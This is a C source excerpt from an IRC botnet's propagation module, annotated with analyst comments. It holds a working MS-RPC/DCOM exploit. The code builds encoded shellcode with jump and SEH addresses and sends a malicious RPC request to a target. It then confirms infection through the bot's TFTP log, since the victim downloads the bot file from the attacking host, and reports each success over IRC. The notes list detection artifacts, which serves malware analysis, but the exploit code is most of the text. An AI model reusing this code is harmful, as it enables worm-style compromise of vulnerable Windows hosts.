/*
 * Analyst note: produces an encoded copy of the payload returned by
 * GetShellcode() in the caller-supplied `buffer`. The encoding is done by
 * EncodeRNS0() (defined elsewhere); from the name it presumably yields a
 * 0-terminated blob -- confirm against EncodeRNS0.
 *
 * Returns the encoded length, or 0 when the precomputed encoded size is
 * larger than `buffersize` or larger than 65535. The intermediate raw
 * payload is staged on the heap and freed before return; the malloc()
 * result is used without a NULL check.
 */
DWORD GetRNS0TerminatedShellcode(char *buffer, DWORD buffersize, char *ownip, char *botfilename)
{
    DWORD RNS0TerminatedShellcodeSize = GetRNS0TerminatedShellcodeSize(ownip, botfilename);
    if (RNS0TerminatedShellcodeSize > buffersize) return 0;
    if (RNS0TerminatedShellcodeSize > 65535) return 0;
    // GetShellcodeSize() is evaluated twice (here and in the GetShellcode call below)
    char *Shellcode = (char *)malloc(GetShellcodeSize(ownip, botfilename)+257);
    DWORD ShellcodeSize = GetShellcode(Shellcode, GetShellcodeSize(ownip, botfilename), ownip, botfilename);
    RNS0TerminatedShellcodeSize = EncodeRNS0(buffer, buffersize, Shellcode, ShellcodeSize);
    free(Shellcode);
    return RNS0TerminatedShellcodeSize;
}
/*
 * Analyst note: exploit module aimed at the MS-RPC/DCOM service of the host
 * described by `exinfo`. Observable flow: fingerprint the host over RPC,
 * assemble an encoded payload and an RPC request, connect, send a bind
 * request, check the reply for a bind-ack, send the request, then poll the
 * bot's own log for a "[TFTP]: File transfer complete" line (six tries,
 * 5 s apart) and announce the result over IRC.
 *
 * Detection-relevant artifacts visible in this function:
 *  - network: RPC bind followed by a single request to exinfo.port;
 *  - log/IRC strings: "[TFTP]: File transfer complete to IP: <ip>" and
 *    "[<exploit name>]: Exploiting IP: <ip>.";
 *  - timing: Sleep(5000) polling loop of up to ~30 s after the request.
 *
 * Return value: FALSE on fingerprint/socket/connect/send/bind-ack/fault
 * failures; TRUE otherwise, whether or not the log line was seen.
 */
BOOL dcom2(EXINFO exinfo)
{
    char sendbuf[IRCLINE],*pTemp;
    char szRecvBuf[4096],szLoadBuf[4096],szReqBuf[4096],szShellBuf[4096],szLoaderBuf[4096];
    int iShellSize=0,iLoaderSize=0,iPos=0,iSCSize=0,iLoadSize=0,iReqSize=0;
    // RPC-based OS fingerprint; unknown and NT hosts are skipped
    int TargetOS = FpHost(exinfo.ip, FP_RPC);
    if (TargetOS == OS_UNKNOWN || TargetOS == OS_WINNT) return FALSE;
    // get a funky fresh socket
    SOCKET sSocket = fsocket(AF_INET, SOCK_STREAM, IPPROTO_IP);
    if (sSocket == SOCKET_ERROR) return FALSE;
    // fill in sockaddr and resolve the host
    SOCKADDR_IN ssin;
    memset(&ssin, 0, sizeof(ssin));
    ssin.sin_family = AF_INET;
    ssin.sin_port = fhtons((unsigned short)exinfo.port);
    ssin.sin_addr.s_addr = finet_addr(exinfo.ip);
    // encoded payload goes into szShellBuf; `filename` and `dcom2_*` are file-scope globals
    iShellSize = GetRNS0TerminatedShellcode(szShellBuf, 4096, GetIP(exinfo.sock), filename);
    if (!iShellSize) return 0;
    iLoaderSize = EncodeRNS0(szLoaderBuf, 4096, dcom2_loader, sizeof(dcom2_loader)-1);
    // load buffer = static template, with encoded pieces and two 4-byte
    // addresses written at fixed offsets (DCOM2_SCBUF_OFFSET_* constants, defined elsewhere)
    memcpy(szLoadBuf+iPos, dcom2_shellcode_buf, sizeof(dcom2_shellcode_buf) );
    iPos+=sizeof(dcom2_shellcode_buf);
    memcpy(szLoadBuf+DCOM2_SCBUF_OFFSET_SC, szLoaderBuf, iLoaderSize );
    memcpy(szLoadBuf+DCOM2_SCBUF_OFFSET_SC, szShellBuf, iShellSize );
    memcpy(szLoadBuf+DCOM2_SCBUF_OFFSET_JMP_ADDR, &dcom2_my_offsets[0].lJmpAddr, 4 );
    memcpy(szLoadBuf+DCOM2_SCBUF_OFFSET_TOP_SEH, &dcom2_my_offsets[0].lTopSEH, 4 );
    iLoadSize = iPos;
    iPos = 0;
    // Length fields of the request template are adjusted in place for the
    // load size. NOTE(review): the copy of dcom2_request1 into szReqBuf is
    // not visible in this listing, and iReqSize is not assigned here.
    pTemp = szReqBuf+sizeof(dcom2_request1)-1;
    // Fill the request with the right sizes
    *(unsigned long*)(pTemp) = *(unsigned long*)(pTemp) + iLoadSize / 2;
    *(unsigned long*)(pTemp+8) = *(unsigned long*)(pTemp+8) + iLoadSize / 2;
    pTemp=szReqBuf;
    *(unsigned long*)(pTemp+8) = *(unsigned long*)(pTemp+8) + iLoadSize - 12;
    *(unsigned long*)(pTemp+16) = *(unsigned long*)(pTemp+16) + iLoadSize - 12;
    *(unsigned long*)(pTemp+128) = *(unsigned long*)(pTemp+128) + iLoadSize - 12;
    *(unsigned long*)(pTemp+132) = *(unsigned long*)(pTemp+132) + iLoadSize - 12;
    *(unsigned long*)(pTemp+180) = *(unsigned long*)(pTemp+180) + iLoadSize - 12;
    *(unsigned long*)(pTemp+184) = *(unsigned long*)(pTemp+184) + iLoadSize - 12;
    *(unsigned long*)(pTemp+208) = *(unsigned long*)(pTemp+208) + iLoadSize - 12;
    *(unsigned long*)(pTemp+396) = *(unsigned long*)(pTemp+396) + iLoadSize - 12;
    // connect with target IP
    int iErr = fconnect(sSocket, (LPSOCKADDR)&ssin, sizeof(ssin));
    if (iErr==-1) {
        // connect failed, exit
        fclosesocket(sSocket);
        return FALSE;
    }
    // send the bind string
    if (fsend(sSocket, dcom2_bindstr, sizeof(dcom2_bindstr)-1, 0) == SOCKET_ERROR) {
        fclosesocket(sSocket);
        return FALSE;
    }
    // read reply
    // frecv's return value is ignored; byte 2 (DCE-RPC packet type) is
    // inspected even if nothing was received into szRecvBuf
    frecv(sSocket, szRecvBuf, 4096, 0);
    // Check for DCE_PKT_BINDACK
    if (szRecvBuf[2] != DCE_PKT_BINDACK) {
        fclosesocket(sSocket);
        return FALSE;
    }
    // send evil request
    if (fsend(sSocket, szReqBuf, iReqSize, 0) == SOCKET_ERROR) {
        fclosesocket(sSocket);
        return FALSE;
    }
    // read reply
    frecv(sSocket, szRecvBuf, 4096, 0);
    // a DCE-RPC fault reply is treated as failure
    if (szRecvBuf[2] == DCE_PKT_FAULT) {
        fclosesocket(sSocket);
        return FALSE;
    }
    fclosesocket(sSocket);
    // Success is inferred from the bot's own log rather than the RPC reply:
    // the expected log line (presumably written by the bot's TFTP server when
    // the victim fetches the file -- confirm against searchlog/addlog callers)
    // is polled for up to six times at 5 s intervals.
    sprintf(sendbuf,"[TFTP]: File transfer complete to IP: %s", exinfo.ip);
    for (int i=0; i < 6; i++) {
        if (searchlog(sendbuf)) {
            // status line to IRC (unless silent), to the log, and into the global exploit stats
            sprintf(sendbuf, "[%s]: Exploiting IP: %s.", exploit[exinfo.exploit].name, exinfo.ip);
            if (!exinfo.silent) irc_privmsg(exinfo.sock, exinfo.chan, sendbuf, exinfo.notice);
            addlog(sendbuf);
            exploit[exinfo.exploit].stats++;
            break;
        }
        Sleep(5000);
    }
    // TRUE is returned even when the log line was never observed
    return TRUE;
}